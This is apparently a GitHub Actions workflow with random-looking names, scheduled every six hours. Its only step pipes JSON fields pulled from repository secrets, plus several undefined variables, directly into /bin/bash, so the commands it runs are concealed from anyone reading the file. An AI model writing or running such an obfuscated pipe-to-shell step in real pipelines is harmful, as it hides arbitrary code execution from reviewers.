name: ludishen9910

on:
  workflow_dispatch:
  schedule:
    - cron: '58 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ludishen9910
        env:
          qjq3: ${{ secrets.qjq3 }}
        run: |
          echo $qjq3 | jq -r .dwthq104 | /bin/bash
          echo $h46 | jq -r .vhrb1 | /bin/bash
          echo $qoh8 | jq -r .efjl2129 | /bin/bash
          echo $cd3892 | jq -r .slte4014 | /bin/bash
          echo $qi7774 | jq -r .wbyya815 | /bin/bash
          echo $b966 | jq -r .kou43 | /bin/bash

